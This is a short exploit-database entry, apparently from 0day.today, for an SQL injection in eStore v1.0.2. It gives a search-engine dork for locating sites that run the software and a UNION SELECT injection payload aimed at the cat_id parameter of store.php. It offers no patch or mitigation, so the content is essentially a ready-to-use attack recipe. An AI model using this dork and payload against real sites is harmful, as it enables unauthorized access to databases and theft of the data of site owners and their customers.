id: 10487
date: 12/29/2009
title: eStore v1.0.2 SQL Injection Vulnerability
author: R3VAN_BASTARD
cves: 

=========================================
eStore v1.0.2 SQL Injection Vulnerability
=========================================

=====================================================================================================
Dork: intext:"Powered by eStore v1.0.2"
 
Exploite: /path/store.php?cat_id=00+AND+1=2+UNION+SELECT+[SQLi],2,3,4,5,6,7,8,9,10,11,12,13,14,15--
 
=====================================================================================================



#  0day.today [2023-03-27]  #